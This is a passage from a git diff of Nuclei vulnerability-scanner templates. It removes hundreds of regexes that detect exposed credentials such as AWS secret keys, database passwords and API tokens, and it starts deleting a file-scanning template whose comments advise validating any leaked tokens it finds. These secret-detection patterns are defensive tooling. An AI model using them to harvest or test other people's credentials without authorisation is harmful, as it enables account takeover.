"(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?digitalocean[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dgpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?secure[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddgc[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddg[_-]?test[_-]?email[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ddg[_-]?test[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?db[_-]?connection[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?datadog[_-]?app[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?datadog[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?port[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?database[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?danger[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cypress[_-]?record[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coverity[_-]?scan[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coveralls[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cos[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conversation[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conversation[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?v2[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?integration[_-]?management[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?cma[_-]?test[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?contentful[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?consumerkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?consumer[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?conekta[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?coding[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codecov[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codeclimate[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?codacy[_-]?project[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cocoapods[_-]?trunk[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cocoapods[_-]?trunk[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clu[_-]?repo[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudinary[_-]?url[_-]?staging[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudinary[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?auth[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?auth[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudflare[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?service[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?processed[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?parsed[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?order[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?instance[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?audited[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloudant[_-]?archived[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cloud[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?clojars[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cli[_-]?e2e[_-]?cma[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?superuser[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?user[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?server[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?registry[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?project[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?chrome[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?chrome[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cheverny[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cf[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?certificate[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?censys[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cargo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cache[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bx[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bx[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bundlesize[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?built[_-]?branch[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?browserstack[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?browser[_-]?stack[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pass[_-]?prod[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintraykey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?gpg[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?b2[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?b2[_-]?app[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awscn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awscn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awsaccesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?config[_-]?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?config[_-]?accesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?author[_-]?npm[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?author[_-]?email[_-]?addr[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth0[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth0[_-]?api[_-]?clientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?assistant[_-]?iam[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifactory[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?argos[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apple[_-]?id[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?appclientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?secrete[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?report[_-]?token[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?bucket[_-]?perm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apigw[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apiary[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aos[_-]?sec[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aos[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ansible[_-]?vault[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?android[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?anaconda[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?amazon[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?amazon[_-]?bucket[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alicloud[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alicloud[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alias[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?key[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?search[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?mcm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']" + - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" + +# Enhanced by md on 2023/05/04 +# digest: 4a0a00473045022100b72b69d337c25863bb7f860b4a6811ae2eefe0dd86e750fec9e74e84acbe9f61022035683b418d60d3eadb52eafc6261e03e9eb0e08e2c6f0f3d51bf38f43da64e66:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml deleted file mode 100644 index 7ff73aca3a..0000000000 --- a/file/keys/credential-exposure.yaml +++ /dev/null @@ -1,721 +0,0 @@ -id: credentials-disclosure-file - -# Extract secrets regex like api keys, password, token, etc ... for different services -# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. -# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. -# Regex count:- 687 - -# Notes:- -# This template requires manual inspection once found valid match. -# Generic token could be anything matching below regex. -# Impact of leaked token depends on validation of leaked token. - -info: - name: Credentials Disclosure Check - author: Sy3Omda,geeknik,forgedhallpass,ayadi - severity: unknown - description: Look for multiple keys/tokens/passwords hidden inside of files. - tags: exposure,token,file,disclosure - -# The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml -# TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating -# Example cases to match against: https://regex101.com/r/HPtaU2/1 - -file: - - extensions: - - all - - extractors: - - type: regex - 